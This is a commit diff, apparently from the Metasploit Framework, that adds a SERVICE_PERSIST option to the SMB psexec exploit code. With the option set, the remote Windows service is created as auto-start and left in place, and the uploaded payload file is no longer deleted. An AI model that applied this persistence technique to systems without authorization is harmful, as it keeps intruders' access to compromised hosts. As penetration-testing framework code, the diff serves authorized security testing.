Auto persist

bug/bundler_fix
Meatballs 2014-04-05 18:50:49 +01:00
parent fd7f35d8b2
commit 2c9209f8b1
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2 changed files with 36 additions and 10 deletions

View File

@ -23,18 +23,34 @@ module Exploit::Remote::SMB::Psexec
OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]), OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]) OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
], self.class) ], self.class)
register_advanced_options(
[
OptBool.new('SERVICE_PERSIST', [ true, 'Create an Auto run service and do not remove it.', false])
], self.class)
end end
# Retrieve the SERVICE_NAME option, generate a random
# one if not already set.
#
# @return service_name [String] the name of the service.
def service_name def service_name
@service_name ||= datastore['SERVICE_NAME'] @service_name ||= datastore['SERVICE_NAME']
@service_name ||= rand_text_alpha(8) @service_name ||= rand_text_alpha(8)
end end
# Retrieve the SERVICE_DISPLAY_NAME option, generate a random
# one if not already set.
#
# @return service_display_name [String] the display name of the service.
def display_name def display_name
@display_name ||= datastore['SERVICE_DISPLAY_NAME'] @display_name ||= datastore['SERVICE_DISPLAY_NAME']
@display_name ||= rand_text_alpha(16) @display_name ||= rand_text_alpha(16)
end end
# Retrieve the SERVICE_DESCRIPTION option
#
# @return service_description [String] the service description.
def service_description def service_description
@service_description ||= datastore['SERVICE_DESCRIPTION'] @service_description ||= datastore['SERVICE_DESCRIPTION']
end end
@ -89,8 +105,14 @@ module Exploit::Remote::SMB::Psexec
return false unless scm_handle return false unless scm_handle
if datastore['SERVICE_PERSIST']
opts = { :start => SERVICE_AUTO_START }
else
opts = {}
end
vprint_status("#{peer} - Creating the service...") vprint_status("#{peer} - Creating the service...")
svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, {}) svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, opts)
case svc_status case svc_status
when ERROR_SUCCESS when ERROR_SUCCESS
@ -133,6 +155,8 @@ module Exploit::Remote::SMB::Psexec
# Maybe we could have a force cleanup option..? # Maybe we could have a force cleanup option..?
if service_exists if service_exists
print_warning("#{peer} - Not removing service as it already existed...") print_warning("#{peer} - Not removing service as it already existed...")
elsif datastore['SERVICE_PERSIST']
print_warning("#{peer} - Not removing service for persistance...")
else else
vprint_status("#{peer} - Removing the service...") vprint_status("#{peer} - Removing the service...")
svc_status = dce_deleteservice(dcerpc, svc_handle) svc_status = dce_deleteservice(dcerpc, svc_handle)

View File

@ -196,15 +196,17 @@ class Metasploit3 < Msf::Exploit::Remote
psexec(file_location, false) psexec(file_location, false)
print_status("Deleting \\#{filename}...") unless datastore['SERVICE_PERSIST']
sleep(1) print_status("Deleting \\#{filename}...")
#This is not really useful but will prevent double \\ on the wire :) sleep(1)
if datastore['SHARE'] =~ /.[\\\/]/ #This is not really useful but will prevent double \\ on the wire :)
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") if datastore['SHARE'] =~ /.[\\\/]/
simple.delete("\\#{fileprefix}\\#{filename}") simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
else simple.delete("\\#{fileprefix}\\#{filename}")
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") else
simple.delete("\\#{filename}") simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
simple.delete("\\#{filename}")
end
end end
end end
handler handler